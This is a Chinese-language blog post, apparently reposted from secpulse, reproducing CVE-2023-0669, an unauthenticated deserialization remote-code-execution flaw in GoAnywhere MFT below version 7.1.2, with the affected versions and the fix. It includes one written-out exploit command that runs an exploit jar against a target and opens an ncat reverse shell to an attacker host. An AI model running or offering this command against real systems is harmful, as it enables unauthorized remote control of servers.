CVE-2023-0669 GoAnywhereMFT反序列化漏洞复现
2023-2-15 13:38:38 Author: www.secpulse.com(查看原文) 阅读量:61 收藏

免责声明

文中提到的所有技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途,否则产生的一切后果自行承担,与本文作者无关!

GoAnywhereMFT

GoAnywhereMFT是一个管理文件传输的解决方案,它简化了系统、员工、客户和贸易伙伴之间的数据交换。它通过广泛的安全设置、详细的审计跟踪提供集中控制,并帮助将文件中的信息处理为XML、EDI、CSV和JSON数据库。

CVE-2023-0669

GoAnywhereMFT管理端存在反序列化漏洞,攻击者利用该漏洞无需登录便可以远程执行任意命令。漏洞被追踪为CVE-2023-0669。

影响范围

GoAnywhereMFT小于7.1.2版本

漏洞复现

工具使用说明:

jar.png

本地java版本:

java.png

使用命令反弹shell:
java -jar CVE-2023-0669.jar -p http://127.0.0.1:8080 -t http://x.x.x.x/ -c "ncat -e /bin/bash yourvps yourport"

exp.png

注意:-p 代理 不可不指定,否则会报错,将流量转到burp即可

burp数据包:

burp.png

工具下载地址:【黑客前沿】公众号回复 CVE-2023-0669 获取

漏洞修复

更新到7.1.2版本。

本文作者:黑客前沿

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/195880.html


文章来源: https://www.secpulse.com/archives/195880.html
如有侵权请联系:admin#unsafe.sh